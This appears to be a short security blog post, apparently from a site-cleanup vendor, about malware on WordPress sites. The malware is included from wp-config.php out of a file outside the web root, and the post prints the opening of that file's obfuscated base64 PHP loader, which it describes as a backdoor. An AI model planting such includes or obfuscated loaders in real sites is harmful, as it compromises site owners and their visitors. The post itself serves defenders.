We are seeing an interesting trend lately. A site gets compromised and starts to distribute malware to its users.
The webmaster (owner of the site) searches everywhere for malicious strings, and can’t find anything. Where can it be hidden?
It could be outside the root directory of your site. On many sites we analysed in the last few days, they had the following code in the wp-config.php (yes, WordPress sites on shared hosts):
require( ABSPATH . “/../etc/mailquota”);
Hum… It is including mailquota which is not a PHP file. When you look at the file you get a long string of encoded PHP:
ncftp /etc > cat mailquota
<?$GLOBALS[‘_1562346450_’]=Array(base64_decode(‘ZX’ .’Jy’ .’b3J’ .’fc’ .’mVwb3J0aW5′ .’n’),base64_decode(‘cHJlZ19t’ .’YXRj’ .’aA’ .’==’),base64_decode(‘cHJlZ19t’ .’YXRja’ .’A==’),base64_decode(‘c’ .’HJlZ19tYX’ .’Rja’ .’A==’),base64_decode(‘Z2V0aG9z’ .’dGJ5YWRk’ .’cg==’)); ..{$a=Array(‘QF45N1wuMTA3XC4xMzV8MTczXC4yMzBcLjEyOHw2NlwuMjI4XC4zNEA=’,
…
Which after decoded does a bunch of nasty things (include a javascript malware, acts as a backdoor, etc).
The lesson here? Never limit yourself to your web site root directory when searching for malicious strings. They can be anywhere (even hidden as Apache modules).
Web site hacked? You think it is? Scan it here to double check: http://sitecheck.sucuri.net.
Need help cleaning up a site?
Leave a reply
